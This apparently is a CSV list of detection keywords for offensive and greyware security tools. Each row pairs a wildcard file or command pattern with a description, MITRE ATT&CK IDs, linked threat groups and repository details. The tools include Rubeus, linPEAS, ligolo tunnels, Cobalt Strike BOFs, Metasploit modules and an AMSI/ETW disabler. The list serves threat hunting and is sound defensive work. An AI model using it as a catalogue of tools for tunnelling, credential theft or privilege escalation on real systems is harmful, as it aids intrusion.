Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*lib/ForgeTicket.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*lib/S4U.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*LibcRealpathBufferUnderflow/RationalLove.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*libFuzzer-HOWTO.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*libnspr_nspr_log_file_priv_esc.*,offensive_tool_keyword,metasploit,Metasploit is a 
widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*libreoffice2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*libs/bofalloc*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*libs/bofentry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*libs/bofhelper*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,0,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*LibSnaffle.ActiveDirectory*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*LibSnaffle.FileDiscovery*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,0,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*libSSH-Authentication-Bypass*,offensive_tool_keyword,POC,LibSSH Authentication bypass CVE-2018-10933 exploitation tool,T1210 - T1573 - T1553 - T1003 - T1059,TA0006 - TA0011 - TA0008,N/A,N/A,Exploitation tools,https://github.com/nikhil1232/LibSSH-Authentication-Bypass,1,0,N/A,N/A,1,6,2,2018-12-19T15:46:37Z,2018-12-19T15:33:00Z -*libwireshark16*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 
-*libwireshark-data*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*libwireshark-dev*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*libwiretap13*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*libxpc_mitm_ssudo.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*libxselinux.old*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*libxselinux.so*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - 
T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lightsout.py*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*LightsOut-master.zip*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*ligolo.lan*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo_darwin*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo_linux*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo_windows*.exe*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo-master*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo-ng -selfcert*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*LinEnum.sh*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*LinEnum-master.ip*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege 
Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*link_tcp 127.0.0.1 *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*linkedin2username.py -u*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*LinkedInt*,offensive_tool_keyword,LinkedInt,LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/mdsecactivebreach/LinkedInt,1,0,N/A,N/A,5,463,112,2023-05-23T23:34:22Z,2017-07-12T12:58:47Z -*linpeas_builder.py*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_darwin_amd64*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_darwin_amd64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation 
Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_darwin_arm64*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_darwin_arm64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_fat.sh*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_linux_386*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_linux_386*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - 
T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_linux_amd64*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_linux_amd64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_linux_arm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_linux_arm64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linux_hostrecon*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation 
tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*linux_hostrecon.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Linux_LPE_eBPF_CVE*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*linux_sudo_cve-2017-1000367.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*linux_trap_command.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*LinuxARMLELF32.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*linux-exploit-suggester*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*linux-exploit-suggester*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege 
Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*linux-exploit-suggester.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linuxprivchecker*,offensive_tool_keyword,linuxprivchecker,search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits,T1210.001 - T1082 - T1088 - T1547.001,TA0002 - TA0004 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py,1,0,N/A,N/A,10,1344,483,2022-01-31T10:32:08Z,2016-04-19T13:31:46Z -*linuxprivchecker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*linux-rds-exploit.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z 
